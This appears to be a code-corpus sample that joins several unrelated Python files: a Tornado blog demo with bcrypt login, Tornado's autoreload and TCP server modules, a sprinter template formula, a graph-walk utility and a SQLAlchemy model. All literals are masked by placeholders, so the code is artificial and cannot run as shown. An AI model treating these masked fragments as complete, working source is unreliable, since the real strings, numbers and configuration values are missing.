import bcrypt
import concurrent.futures
import MySQLdb
import markdown
import os.path
import re
import subprocess
import torndb
import tornado.escape
from tornado import gen
import tornado.httpserver
import tornado.ioloop
import tornado.options
import tornado.web
import unicodedata

from tornado.options import define, options

define("<STR_LIT:port>", default=<NUM_LIT>, help="<STR_LIT>", type=int)
define("<STR_LIT>", default="<STR_LIT>", help="<STR_LIT>")
define("<STR_LIT>", default="<STR_LIT>", help="<STR_LIT>")
define("<STR_LIT>", default="<STR_LIT>", help="<STR_LIT>")
define("<STR_LIT>", default="<STR_LIT>", help="<STR_LIT>")

# Thread pool used to run blocking bcrypt hashing off the IOLoop thread.
executor = concurrent.futures.ThreadPoolExecutor(<NUM_LIT:2>)


class Application(tornado.web.Application):
    def __init__(self):
        handlers = [
            (r"<STR_LIT:/>", HomeHandler),
            (r"<STR_LIT>", ArchiveHandler),
            (r"<STR_LIT>", FeedHandler),
            (r"<STR_LIT>", EntryHandler),
            (r"<STR_LIT>", ComposeHandler),
            (r"<STR_LIT>", AuthCreateHandler),
            (r"<STR_LIT>", AuthLoginHandler),
            (r"<STR_LIT>", AuthLogoutHandler),
        ]
        settings = dict(
            blog_title=u"<STR_LIT>",
            template_path=os.path.join(os.path.dirname(__file__), "<STR_LIT>"),
            static_path=os.path.join(os.path.dirname(__file__), "<STR_LIT>"),
            ui_modules={"<STR_LIT>": EntryModule},
            xsrf_cookies=True,
            cookie_secret="<STR_LIT>",
            login_url="<STR_LIT>",
            debug=True,
        )
        super(Application, self).__init__(handlers, **settings)
        # One shared blocking DB connection for the whole process.
        self.db = torndb.Connection(
            host=options.mysql_host, database=options.mysql_database,
            user=options.mysql_user, password=options.mysql_password)
        self.maybe_create_tables()

    def maybe_create_tables(self):
        # Probe the schema with a query; on failure, load it by piping a
        # file into the mysql command-line client.
        try:
            self.db.get("<STR_LIT>")
        except MySQLdb.ProgrammingError:
            subprocess.check_call(['<STR_LIT>',
                                   '<STR_LIT>' + options.mysql_host,
                                   '<STR_LIT>' + options.mysql_database,
                                   '<STR_LIT>' + options.mysql_user,
                                   '<STR_LIT>' + options.mysql_password],
                                  stdin=open('<STR_LIT>'))


class BaseHandler(tornado.web.RequestHandler):
    @property
    def db(self):
        return self.application.db

    def get_current_user(self):
        # The secure cookie holds the author's integer id.
        user_id = self.get_secure_cookie("<STR_LIT>")
        if not user_id: return None
        return self.db.get("<STR_LIT>", int(user_id))

    def any_author_exists(self):
        return bool(self.db.get("<STR_LIT>"))


class HomeHandler(BaseHandler):
    def get(self):
        entries = self.db.query("<STR_LIT>"
                                "<STR_LIT>")
        if not entries:
            # Nothing published yet: redirect rather than render an
            # empty page.
            self.redirect("<STR_LIT>")
            return
        self.render("<STR_LIT>", entries=entries)


class EntryHandler(BaseHandler):
    def get(self, slug):
        entry = self.db.get("<STR_LIT>", slug)
        if not entry: raise tornado.web.HTTPError(<NUM_LIT>)
        self.render("<STR_LIT>", entry=entry)


class ArchiveHandler(BaseHandler):
    def get(self):
        entries = self.db.query("<STR_LIT>"
                                "<STR_LIT>")
        self.render("<STR_LIT>", entries=entries)


class FeedHandler(BaseHandler):
    def get(self):
        entries = self.db.query("<STR_LIT>"
                                "<STR_LIT>")
        self.set_header("<STR_LIT:Content-Type>", "<STR_LIT>")
        self.render("<STR_LIT>", entries=entries)


class ComposeHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self):
        # With an id argument this is an edit form; without, a new entry.
        id = self.get_argument("<STR_LIT:id>", None)
        entry = None
        if id:
            entry = self.db.get("<STR_LIT>", int(id))
        self.render("<STR_LIT>", entry=entry)

    @tornado.web.authenticated
    def post(self):
        id = self.get_argument("<STR_LIT:id>", None)
        title = self.get_argument("<STR_LIT:title>")
        text = self.get_argument("<STR_LIT>")
        html = markdown.markdown(text)
        if id:
            # Editing: keep the existing slug and update the stored row.
            entry = self.db.get("<STR_LIT>", int(id))
            if not entry: raise tornado.web.HTTPError(<NUM_LIT>)
            slug = entry.slug
            self.db.execute(
                "<STR_LIT>"
                "<STR_LIT>", title, text, html, int(id))
        else:
            # New entry: derive an ASCII slug from the title, then keep
            # appending a suffix until no existing row collides.
            slug = unicodedata.normalize("<STR_LIT>", title).encode(
                "<STR_LIT:ascii>", "<STR_LIT:ignore>")
            slug = re.sub(r"<STR_LIT>", "<STR_LIT:U+0020>", slug)
            slug = "<STR_LIT:->".join(slug.lower().strip().split())
            if not slug: slug = "<STR_LIT>"
            while True:
                e = self.db.get("<STR_LIT>", slug)
                if not e: break
                slug += "<STR_LIT>"
            self.db.execute(
                "<STR_LIT>"
                "<STR_LIT>",
                self.current_user.id, title, slug, text, html)
        self.redirect("<STR_LIT>" + slug)


class AuthCreateHandler(BaseHandler):
    def get(self):
        self.render("<STR_LIT>")

    @gen.coroutine
    def post(self):
        # This app supports a single author account.
        if self.any_author_exists():
            raise tornado.web.HTTPError(<NUM_LIT>, "<STR_LIT>")
        # bcrypt is CPU-heavy; run it on the thread pool so the IOLoop
        # stays responsive.
        hashed_password = yield executor.submit(
            bcrypt.hashpw, tornado.escape.utf8(self.get_argument("<STR_LIT:password>")),
            bcrypt.gensalt())
        author_id = self.db.execute(
            "<STR_LIT>"
            "<STR_LIT>",
            self.get_argument("<STR_LIT:email>"), self.get_argument("<STR_LIT:name>"),
            hashed_password)
        self.set_secure_cookie("<STR_LIT>", str(author_id))
        self.redirect(self.get_argument("<STR_LIT>", "<STR_LIT:/>"))


class AuthLoginHandler(BaseHandler):
    def get(self):
        if not self.any_author_exists():
            self.redirect("<STR_LIT>")
        else:
            self.render("<STR_LIT>", error=None)

    @gen.coroutine
    def post(self):
        author = self.db.get("<STR_LIT>",
                             self.get_argument("<STR_LIT:email>"))
        if not author:
            self.render("<STR_LIT>", error="<STR_LIT>")
            return
        # Re-hash the submitted password with the stored hash as salt and
        # compare against the stored value.
        hashed_password = yield executor.submit(
            bcrypt.hashpw, tornado.escape.utf8(self.get_argument("<STR_LIT:password>")),
            tornado.escape.utf8(author.hashed_password))
        # NOTE(review): plain == is not a constant-time comparison;
        # consider hmac.compare_digest to avoid a timing side channel.
        if hashed_password == author.hashed_password:
            self.set_secure_cookie("<STR_LIT>", str(author.id))
            self.redirect(self.get_argument("<STR_LIT>", "<STR_LIT:/>"))
        else:
            self.render("<STR_LIT>", error="<STR_LIT>")


class AuthLogoutHandler(BaseHandler):
    def get(self):
        self.clear_cookie("<STR_LIT>")
        self.redirect(self.get_argument("<STR_LIT>", "<STR_LIT:/>"))


class EntryModule(tornado.web.UIModule):
    def render(self, entry):
        return self.render_string("<STR_LIT>", entry=entry)


def main():
    tornado.options.parse_command_line()
    http_server = tornado.httpserver.HTTPServer(Application())
    http_server.listen(options.port)
    tornado.ioloop.IOLoop.current().start()


if __name__ == "<STR_LIT:__main__>":
    main()
"""<STR_LIT>"""
from __future__ import absolute_import, division, print_function, with_statement

import os
import sys

if __name__ == "<STR_LIT:__main__>":
    # When run as a script, drop this module's own directory from sys.path
    # so imports resolve against the target application instead.
    if sys.path[<NUM_LIT:0>] == os.path.dirname(__file__):
        del sys.path[<NUM_LIT:0>]

import functools
import logging
import os
import pkgutil
import sys
import traceback
import types
import subprocess
import weakref

from tornado import ioloop
from tornado.log import gen_log
from tornado import process
from tornado.util import exec_in

try:
    import signal
except ImportError:
    signal = None

# Platforms without a usable execv get a spawn-then-exit fallback instead.
_has_execv = sys.platform != '<STR_LIT:win32>'

_watched_files = set()
_reload_hooks = []
_reload_attempted = False
# Weak keys so watched IOLoops can still be garbage collected.
_io_loops = weakref.WeakKeyDictionary()


def start(io_loop=None, check_time=<NUM_LIT>):
    """<STR_LIT>"""
    io_loop = io_loop or ioloop.IOLoop.current()
    if io_loop in _io_loops:
        # Already watching on this loop; nothing to do.
        return
    _io_loops[io_loop] = True
    if len(_io_loops) > <NUM_LIT:1>:
        gen_log.warning("<STR_LIT>")
    if _has_execv:
        add_reload_hook(functools.partial(io_loop.close, all_fds=True))
    modify_times = {}
    callback = functools.partial(_reload_on_update, modify_times)
    # Poll file mtimes every check_time milliseconds.
    scheduler = ioloop.PeriodicCallback(callback, check_time, io_loop=io_loop)
    scheduler.start()


def wait():
    """<STR_LIT>"""
    io_loop = ioloop.IOLoop()
    start(io_loop)
    io_loop.start()


def watch(filename):
    """<STR_LIT>"""
    _watched_files.add(filename)


def add_reload_hook(fn):
    """<STR_LIT>"""
    _reload_hooks.append(fn)


def _reload_on_update(modify_times):
    if _reload_attempted:
        # A reload is already in flight; don't trigger another.
        return
    if process.task_id() is not None:
        # Skip in child processes created by fork_processes.
        return
    for module in list(sys.modules.values()):
        if not isinstance(module, types.ModuleType):
            continue
        path = getattr(module, "<STR_LIT>", None)
        if not path:
            continue
        if path.endswith("<STR_LIT>") or path.endswith("<STR_LIT>"):
            # Watch the source file, not the compiled artifact.
            path = path[:-<NUM_LIT:1>]
        _check_file(modify_times, path)
    for path in _watched_files:
        _check_file(modify_times, path)


def _check_file(modify_times, path):
    try:
        modified = os.stat(path).st_mtime
    except Exception:
        # Unreadable/vanished file: ignore.
        return
    if path not in modify_times:
        # First sighting: record the baseline mtime only.
        modify_times[path] = modified
        return
    if modify_times[path] != modified:
        gen_log.info("<STR_LIT>", path)
        _reload()


def _reload():
    global _reload_attempted
    _reload_attempted = True
    for fn in _reload_hooks:
        fn()
    if hasattr(signal, "<STR_LIT>"):
        # Clear any pending interval timer before replacing the process.
        signal.setitimer(signal.ITIMER_REAL, <NUM_LIT:0>, <NUM_LIT:0>)
    path_prefix = '<STR_LIT:.>' + os.pathsep
    if (sys.path[<NUM_LIT:0>] == '<STR_LIT>' and
            not os.environ.get("<STR_LIT>", "<STR_LIT>").startswith(path_prefix)):
        # Preserve the implicit current-directory entry on sys.path for
        # the re-executed process via the environment.
        os.environ["<STR_LIT>"] = (path_prefix +
                                   os.environ.get("<STR_LIT>", "<STR_LIT>"))
    if not _has_execv:
        subprocess.Popen([sys.executable] + sys.argv)
        sys.exit(<NUM_LIT:0>)
    else:
        try:
            os.execv(sys.executable, [sys.executable] + sys.argv)
        except OSError:
            # execv can fail on some platforms; fall back to spawning a
            # fresh process and exiting this one without cleanup.
            os.spawnv(os.P_NOWAIT, sys.executable,
                      [sys.executable] + sys.argv)
            os._exit(<NUM_LIT:0>)


_USAGE = """<STR_LIT>"""


def main():
    """<STR_LIT>"""
    # Keep a pristine copy of argv; it is restored before wait() so the
    # re-exec after a change re-runs the same command line.
    original_argv = sys.argv
    sys.argv = sys.argv[:]
    if len(sys.argv) >= <NUM_LIT:3> and sys.argv[<NUM_LIT:1>] == "<STR_LIT>":
        mode = "<STR_LIT>"
        module = sys.argv[<NUM_LIT:2>]
        del sys.argv[<NUM_LIT:1>:<NUM_LIT:3>]
    elif len(sys.argv) >= <NUM_LIT:2>:
        mode = "<STR_LIT>"
        script = sys.argv[<NUM_LIT:1>]
        sys.argv = sys.argv[<NUM_LIT:1>:]
    else:
        print(_USAGE, file=sys.stderr)
        sys.exit(<NUM_LIT:1>)
    try:
        if mode == "<STR_LIT>":
            import runpy
            runpy.run_module(module, run_name="<STR_LIT:__main__>", alter_sys=True)
        elif mode == "<STR_LIT>":
            with open(script) as f:
                # Execute the script in this module's globals, masquerading
                # as the main program.
                global __file__
                __file__ = script
                global __package__
                del __package__
                exec_in(f.read(), globals(), globals())
    except SystemExit as e:
        logging.basicConfig()
        gen_log.info("<STR_LIT>", e.code)
    except Exception as e:
        logging.basicConfig()
        gen_log.warning("<STR_LIT>", exc_info=True)
        # Watch every file in the traceback so fixing any of them
        # triggers a reload.
        for (filename, lineno, name, line) in traceback.extract_tb(sys.exc_info()[<NUM_LIT:2>]):
            watch(filename)
        if isinstance(e, SyntaxError):
            watch(e.filename)
    else:
        logging.basicConfig()
        gen_log.info("<STR_LIT>")
    sys.argv = original_argv
    if mode == '<STR_LIT>':
        loader = pkgutil.get_loader(module)
        if loader is not None:
            watch(loader.get_filename())
    wait()


if __name__ == "<STR_LIT:__main__>":
    main()
"""<STR_LIT>"""
from __future__ import absolute_import, division, print_function, with_statement

import errno
import os
import socket

from tornado.log import app_log
from tornado.ioloop import IOLoop
from tornado.iostream import IOStream, SSLIOStream
from tornado.netutil import bind_sockets, add_accept_handler, ssl_wrap_socket
from tornado import process
from tornado.util import errno_from_exception

try:
    import ssl
except ImportError:
    # ssl may be missing from some Python builds; SSL use then fails later.
    ssl = None


class TCPServer(object):
    r"""<STR_LIT>"""

    def __init__(self, io_loop=None, ssl_options=None, max_buffer_size=None,
                 read_chunk_size=None):
        self.io_loop = io_loop
        self.ssl_options = ssl_options
        self._sockets = {}  # fd -> listening socket
        self._pending_sockets = []
        self._started = False
        self.max_buffer_size = max_buffer_size
        self.read_chunk_size = read_chunk_size
        # Validate certificate/key paths eagerly so misconfiguration fails
        # at construction time rather than on the first connection.
        if self.ssl_options is not None and isinstance(self.ssl_options, dict):
            if '<STR_LIT>' not in self.ssl_options:
                raise KeyError('<STR_LIT>')
            if not os.path.exists(self.ssl_options['<STR_LIT>']):
                raise ValueError('<STR_LIT>' %
                                 self.ssl_options['<STR_LIT>'])
            if ('<STR_LIT>' in self.ssl_options and
                    not os.path.exists(self.ssl_options['<STR_LIT>'])):
                raise ValueError('<STR_LIT>' %
                                 self.ssl_options['<STR_LIT>'])

    def listen(self, port, address="<STR_LIT>"):
        """<STR_LIT>"""
        sockets = bind_sockets(port, address=address)
        self.add_sockets(sockets)

    def add_sockets(self, sockets):
        """<STR_LIT>"""
        if self.io_loop is None:
            self.io_loop = IOLoop.current()
        for sock in sockets:
            self._sockets[sock.fileno()] = sock
            add_accept_handler(sock, self._handle_connection,
                               io_loop=self.io_loop)

    def add_socket(self, socket):
        """<STR_LIT>"""
        self.add_sockets([socket])

    def bind(self, port, address=None, family=socket.AF_UNSPEC, backlog=<NUM_LIT>, reuse_port=False):
        """<STR_LIT>"""
        sockets = bind_sockets(port, address=address, family=family,
                               backlog=backlog, reuse_port=reuse_port)
        if self._started:
            self.add_sockets(sockets)
        else:
            # Defer registration until start() so process forking can
            # happen first.
            self._pending_sockets.extend(sockets)

    def start(self, num_processes=<NUM_LIT:1>):
        """<STR_LIT>"""
        assert not self._started
        self._started = True
        if num_processes != <NUM_LIT:1>:
            process.fork_processes(num_processes)
        sockets = self._pending_sockets
        self._pending_sockets = []
        self.add_sockets(sockets)

    def stop(self):
        """<STR_LIT>"""
        for fd, sock in self._sockets.items():
            self.io_loop.remove_handler(fd)
            sock.close()

    def handle_stream(self, stream, address):
        """<STR_LIT>"""
        # Subclasses override this to process each accepted connection.
        raise NotImplementedError()

    def _handle_connection(self, connection, address):
        if self.ssl_options is not None:
            assert ssl, "<STR_LIT>"
            try:
                connection = ssl_wrap_socket(connection,
                                             self.ssl_options,
                                             server_side=True,
                                             do_handshake_on_connect=False)
            except ssl.SSLError as err:
                if err.args[<NUM_LIT:0>] == ssl.SSL_ERROR_EOF:
                    # Peer hung up mid-handshake; drop the connection.
                    return connection.close()
                else:
                    raise
            except socket.error as err:
                if errno_from_exception(err) in (errno.ECONNABORTED, errno.EINVAL):
                    # Connection aborted before/around the handshake.
                    return connection.close()
                else:
                    raise
        try:
            if self.ssl_options is not None:
                stream = SSLIOStream(connection, io_loop=self.io_loop,
                                     max_buffer_size=self.max_buffer_size,
                                     read_chunk_size=self.read_chunk_size)
            else:
                stream = IOStream(connection, io_loop=self.io_loop,
                                  max_buffer_size=self.max_buffer_size,
                                  read_chunk_size=self.read_chunk_size)
            future = self.handle_stream(stream, address)
            if future is not None:
                # If handle_stream returned a Future, surface its
                # exceptions on the IOLoop.
                self.io_loop.add_future(future, lambda f: f.result())
        except Exception:
            app_log.error("<STR_LIT>", exc_info=True)
<s> from copy import copy <EOL> from six . moves import filter <EOL> _BOOLEAN_ATTRS = frozenset ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> def htmlbools ( v ) : <EOL> attrs = copy ( v ) <EOL> for key in filter ( lambda k : k in _BOOLEAN_ATTRS , attrs . keys ( ) ) : <EOL> if attrs [ key ] : <EOL> attrs [ key ] = key <EOL> else : <EOL> attrs [ key ] = None <EOL> return attrs </s>
<s> from . core import PHASE <EOL> from . directory import Directory <EOL> from . globals import load_global_config <EOL> from . . next . environment . injections import Injections <EOL> from . manifest import Manifest , ManifestException , load_manifest <EOL> from . featuredict import FeatureDict </s>
<s> """<STR_LIT>""" <EOL> from __future__ import unicode_literals <EOL> import os <EOL> import string <EOL> from collections import defaultdict <EOL> from sprinter . formula . base import FormulaBase <EOL> import sprinter . lib as lib <EOL> from sprinter . core import PHASE <EOL> class TemplateFormula ( FormulaBase ) : <EOL> required_options = FormulaBase . required_options + [ '<STR_LIT:source>' , '<STR_LIT:target>' ] <EOL> valid_options = [ '<STR_LIT>' ] <EOL> def prompt ( self ) : <EOL> if self . environment . phase == PHASE . REMOVE : <EOL> self . source . prompt ( '<STR_LIT>' , <EOL> "<STR_LIT>" % self . source . get ( '<STR_LIT:target>' ) , <EOL> default = "<STR_LIT:yes>" ) <EOL> def install ( self ) : <EOL> self . __install_file ( self . target ) <EOL> FormulaBase . install ( self ) <EOL> def update ( self ) : <EOL> acted = False <EOL> if self . target . has ( '<STR_LIT>' ) and self . target . is_affirmative ( '<STR_LIT>' ) : <EOL> self . __install_file ( self . target ) <EOL> acted = True <EOL> FormulaBase . update ( self ) <EOL> return acted <EOL> def remove ( self ) : <EOL> if self . source . is_affirmative ( '<STR_LIT>' , False ) : <EOL> os . path . unlink ( <EOL> os . path . expanduser ( self . source . get ( '<STR_LIT:target>' ) ) ) <EOL> FormulaBase . remove ( self ) <EOL> def validate ( self ) : <EOL> if self . target : <EOL> if ( self . target . has ( '<STR_LIT:username>' ) and not self . target . has ( '<STR_LIT:password>' ) or <EOL> self . target . has ( '<STR_LIT:password>' ) and not self . target . has ( '<STR_LIT:username>' ) ) : <EOL> self . logger . warn ( "<STR_LIT>" + <EOL> "<STR_LIT>" ) <EOL> FormulaBase . validate ( self ) <EOL> def __install_file ( self , config ) : <EOL> source = config . get ( '<STR_LIT:source>' ) <EOL> if source . startswith ( "<STR_LIT:http>" ) : <EOL> if config . has ( '<STR_LIT:username>' ) and config . has ( '<STR_LIT:password>' ) : <EOL> source_content = self . lib . authenticated_get ( config . 
get ( '<STR_LIT:username>' ) , <EOL> config . get ( '<STR_LIT:password>' ) , <EOL> source ) . decode ( "<STR_LIT:utf-8>" ) <EOL> else : <EOL> source_content = lib . cleaned_request ( '<STR_LIT>' , source ) . text <EOL> else : <EOL> source_content = open ( os . path . expanduser ( source ) ) . read ( ) <EOL> if config . has ( '<STR_LIT>' ) : <EOL> replacements = { } <EOL> for key in config . get ( '<STR_LIT>' ) . split ( '<STR_LIT:U+002C>' ) : <EOL> key = key . strip ( ) <EOL> if config . has ( key ) : <EOL> replacements [ key ] = config . get ( key ) <EOL> try : <EOL> source_content = string . Formatter ( ) . vformat ( <EOL> source_content , ( ) , defaultdict ( str , ** replacements ) ) <EOL> except Exception as e : <EOL> error_message = "<STR_LIT>" . format ( err = e . message ) <EOL> if config . is_affirmative ( '<STR_LIT>' , False ) : <EOL> raise e <EOL> else : <EOL> self . logger . error ( error_message ) <EOL> target_file = os . path . expanduser ( config . get ( '<STR_LIT:target>' ) ) <EOL> parent_directory = os . path . dirname ( target_file ) <EOL> if not os . path . exists ( parent_directory ) : <EOL> os . makedirs ( parent_directory ) <EOL> if os . path . isfile ( target_file ) and config . has ( '<STR_LIT>' ) : <EOL> target_content = open ( target_file ) . read ( ) <EOL> if target_content != source_content : <EOL> backup_target_base = "<STR_LIT>" . format ( path = target_file , ext = config . get ( '<STR_LIT>' ) ) <EOL> backup_target = backup_target_base <EOL> i = <NUM_LIT:1> <EOL> while os . path . isfile ( backup_target ) : <EOL> backup_target = "<STR_LIT>" . format ( path = backup_target_base , i = i ) <EOL> i += <NUM_LIT:1> <EOL> self . logger . info ( "<STR_LIT>" % backup_target ) <EOL> os . rename ( target_file , backup_target ) <EOL> with open ( target_file , '<STR_LIT>' ) as fh : <EOL> fh . write ( source_content ) </s>
<s> import pytest <EOL> from sprinter . next . environment . injections import Injections <EOL> @ pytest . fixture <EOL> def injections ( ) : <EOL> return Injections ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function <EOL> from collections import deque , namedtuple <EOL> from functools import reduce <EOL> import operator <EOL> import sys <EOL> import types <EOL> version_info = ( <NUM_LIT:1> , <NUM_LIT:4> ) <EOL> version = "<STR_LIT:.>" . join ( map ( str , version_info ) ) <EOL> __all__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] <EOL> class ConstSequence ( object ) : <EOL> "<STR_LIT>" <EOL> def __init__ ( self , seq ) : <EOL> if isinstance ( seq , ConstSequence ) : <EOL> seq = seq . _adaptee <EOL> self . _adaptee = seq <EOL> def __getitem__ ( self , key ) : <EOL> if isinstance ( key , types . SliceType ) : <EOL> return ConstSequence ( self . _adaptee [ key ] ) <EOL> else : <EOL> return self . _adaptee [ key ] <EOL> def __len__ ( self ) : <EOL> return len ( self . _adaptee ) <EOL> def __contains__ ( self , key ) : <EOL> return key in self . _adaptee <EOL> def __iter__ ( self ) : <EOL> return ( x for x in self . _adaptee ) <EOL> def __reversed__ ( self ) : <EOL> return ( x for x in reversed ( self . _adaptee ) ) <EOL> class _Int ( int ) : <EOL> pass <EOL> _cs = _Int ( ) <EOL> for _i , _line in enumerate ( """<STR_LIT>""" . strip ( ) . splitlines ( ) ) : <EOL> _name = _line . lstrip ( ) . split ( "<STR_LIT::>" ) [ <NUM_LIT:0> ] <EOL> setattr ( _cs , _name , <NUM_LIT:1> << _i ) <EOL> _NamedEvent = namedtuple ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> def _event_items ( ) : <EOL> yield "<STR_LIT>" , _cs . lnr | _cs . lr <EOL> yield "<STR_LIT>" , _cs . irnc | _cs . ie | _cs . iw | _cs . ix | _cs . ic <EOL> yield "<STR_LIT>" , _cs . ie <EOL> yield "<STR_LIT>" , _cs . iw <EOL> yield "<STR_LIT>" , _cs . ix <EOL> yield "<STR_LIT>" , _cs . lr | _cs . irnc | _cs . ic <EOL> yield "<STR_LIT>" , _cs . ic <EOL> _named_events = tuple ( _NamedEvent ( * pair ) for pair in _event_items ( ) ) <EOL> globals ( ) . 
update ( dict ( _named_events ) ) <EOL> _event_names = tuple ( e . name for e in _named_events ) <EOL> def _test_events ( ) : <EOL> for i , t in enumerate ( ( <EOL> _cs . lnr == ( leaf & ~ bounce ) , <EOL> _cs . lr == ( leaf & bounce ) , <EOL> <NUM_LIT:0> == ( leaf & inner ) , <EOL> _cs . irnc == ( inner & bounce & ~ cycle ) , <EOL> ( _cs . ie == enter ) and ( _cs . ie == ( inner & enter ) ) , <EOL> ( _cs . iw == within ) and ( within == ( inner & within ) ) , <EOL> ( _cs . ix == exit ) and ( exit == ( inner & exit ) ) , <EOL> ( _cs . ic == cycle ) and ( cycle == ( inner & cycle ) ) , <EOL> ( cycle & bounce ) == cycle , <EOL> ( cycle | bounce ) == bounce , <EOL> ) ) : <EOL> assert t , i <EOL> _enter , _within , _exit , _cycle , _pop = ( <EOL> _Int ( enter ) , _Int ( within ) , _Int ( exit ) , _Int ( cycle ) , _Int ( <NUM_LIT:1> << <NUM_LIT:15> ) ) <EOL> def parse_event_arg ( events ) : <EOL> if isinstance ( events , int ) : <EOL> events = ( events , ) <EOL> events = event ( reduce ( operator . or_ , events ) ) <EOL> selector = [ _pop , None , '<STR_LIT>' , None , '<STR_LIT>' , None ] <EOL> for i , ev in ( ( <NUM_LIT:1> , _exit ) , ( <NUM_LIT:3> , _within ) , ( <NUM_LIT:5> , _enter ) ) : <EOL> if ev & events : <EOL> selector [ i ] = ev <EOL> selector = list ( item for item in selector if item is not None ) <EOL> mask = event ( events ) <EOL> return mask , selector <EOL> def event ( n ) : <EOL> """<STR_LIT>""" <EOL> return n & <NUM_LIT> <EOL> if sys . version_info < ( <NUM_LIT:3> , ) : <EOL> def bytes ( x , ** args ) : <EOL> return x <EOL> def event_repr ( _event_names ) : <EOL> import base64 , re , zlib <EOL> s = """<STR_LIT>""" <EOL> s = str ( zlib . decompress ( base64 . b64decode ( bytes ( s , encoding = "<STR_LIT:ascii>" ) ) ) ) <EOL> s = re . sub ( r"<STR_LIT>" , ( lambda mo : _event_names [ int ( mo . group ( <NUM_LIT:0> ) ) ] ) , s ) <EOL> s = re . sub ( r"<STR_LIT>" , r"<STR_LIT>" , s ) <EOL> s = tuple ( "<STR_LIT>" % x for x in s . 
split ( "<STR_LIT:;>" ) ) <EOL> def event_repr ( n ) : <EOL> """<STR_LIT>""" <EOL> return s [ n & <NUM_LIT> ] <EOL> return event_repr <EOL> event_repr = event_repr ( _event_names ) <EOL> class _MockDict ( object ) : <EOL> "<STR_LIT>" <EOL> def __getitem__ ( self , key ) : <EOL> pass <EOL> def __setitem__ ( self , key , value ) : <EOL> pass <EOL> def __contains__ ( self , key ) : <EOL> pass <EOL> def walk ( node , gen_subnodes , event = enter , reverse_path = False , tree = True ) : <EOL> """<STR_LIT>""" <EOL> mask , selector = parse_event_arg ( event ) <EOL> isub = selector . index ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> ileft = selector . index ( '<STR_LIT>' , isub + <NUM_LIT:1> ) <EOL> tcycle = mask & cycle <EOL> tleaf = mask & leaf <EOL> tibounce = mask & bounce & inner <EOL> tfbounce = mask & bounce & leaf <EOL> tffirst = mask & ~ bounce & leaf <EOL> todo = deque ( ( iter ( ( node , ) ) , ) ) <EOL> path = deque ( ) <EOL> const_path = ConstSequence ( path ) <EOL> if reverse_path : <EOL> ppush , ppop , ivisited = path . appendleft , path . popleft , <NUM_LIT:0> <EOL> else : <EOL> ppush , ppop , ivisited = path . append , path . pop , - <NUM_LIT:1> <EOL> less , more = todo . pop , todo . extend <EOL> hist = _MockDict ( ) if tree else dict ( ) <EOL> try : <EOL> while True : <EOL> sequence = todo [ - <NUM_LIT:1> ] <EOL> if sequence . __class__ is _Int : <EOL> less ( ) <EOL> if sequence is _pop : <EOL> hist [ path [ ivisited ] ] = tibounce <EOL> ppop ( ) <EOL> else : <EOL> const_path . event = sequence <EOL> yield const_path <EOL> else : <EOL> try : <EOL> node = next ( sequence ) <EOL> except StopIteration : <EOL> less ( ) <EOL> else : <EOL> ppush ( node ) <EOL> if node in hist : <EOL> const_path . event = hist [ node ] <EOL> if const_path . 
event : <EOL> yield const_path <EOL> ppop ( ) <EOL> else : <EOL> sub = iter ( gen_subnodes ( node ) ) <EOL> try : <EOL> snode = next ( sub ) <EOL> except StopIteration : <EOL> hist [ node ] = tfbounce <EOL> if tleaf : <EOL> const_path . event = tffirst <EOL> yield const_path <EOL> ppop ( ) <EOL> else : <EOL> hist [ node ] = tcycle <EOL> selector [ ileft ] = iter ( ( snode , ) ) <EOL> selector [ isub ] = sub <EOL> more ( selector ) <EOL> except IndexError : <EOL> if todo : <EOL> raise <EOL> for _e in _named_events : <EOL> setattr ( walk , _e . name , _e . value ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> def _graph_example ( n = <NUM_LIT:4> ) : <EOL> from string import ascii_uppercase as labels <EOL> from random import Random <EOL> n = min ( n , <NUM_LIT> ) <EOL> class Node ( object ) : <EOL> def __init__ ( self , letter ) : <EOL> self . letter = str ( letter ) <EOL> self . neigh = list ( ) <EOL> def __str__ ( self ) : <EOL> return self . letter <EOL> __repr__ = __str__ <EOL> nodes = [ Node ( x ) for x in labels [ : n ] ] <EOL> ran = Random ( ) <EOL> ran . seed ( <NUM_LIT> ) <EOL> neighmax = <NUM_LIT:3> <EOL> for n in nodes : <EOL> n . neigh [ : ] = sorted ( ( x for x in ran . sample ( nodes , neighmax ) <EOL> if x is not n ) , key = lambda n : n . letter ) <EOL> for path in walk ( nodes [ <NUM_LIT:0> ] , ( lambda n : n . neigh ) , event ( ~ <NUM_LIT:0> ) , tree = False ) : <EOL> print ( list ( path ) , "<STR_LIT>" . format ( event_repr ( path . event ) ) ) <EOL> def _tree_example ( ) : <EOL> root = ( <EOL> ( ( <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:4> , <NUM_LIT:5> ) , <NUM_LIT:6> ) , <EOL> ( <NUM_LIT:7> , <NUM_LIT:9> ) , <EOL> ) <EOL> def subn ( node ) : <EOL> return node if isinstance ( node , tuple ) else ( ) <EOL> for path in walk ( root , subn , event ( enter | exit | leaf ) ) : <EOL> print ( list ( path ) , "<STR_LIT>" . format ( event_repr ( path . event ) ) ) <EOL> _graph_example ( <NUM_LIT:7> ) <EOL> """<STR_LIT>""" </s>
<s> from sqlalchemy import Column , Integer , String <EOL> from talent_curator . database import Base <EOL> class Candidate ( Base ) : <EOL> __tablename__ = '<STR_LIT>' <EOL> id = Column ( Integer , primary_key = True ) <EOL> first_name = Column ( String ( <NUM_LIT:100> ) ) <EOL> last_name = Column ( String ( <NUM_LIT:100> ) ) <EOL> document_id = Column ( String ( <NUM_LIT> ) ) <EOL> def __init__ ( self , document_id , first_name , last_name = None , * args , ** kwargs ) : <EOL> self . document_id = document_id <EOL> self . first_name = first_name <EOL> self . last_name = last_name <EOL> def __repr__ ( self ) : <EOL> return "<STR_LIT>" % self . id </s>
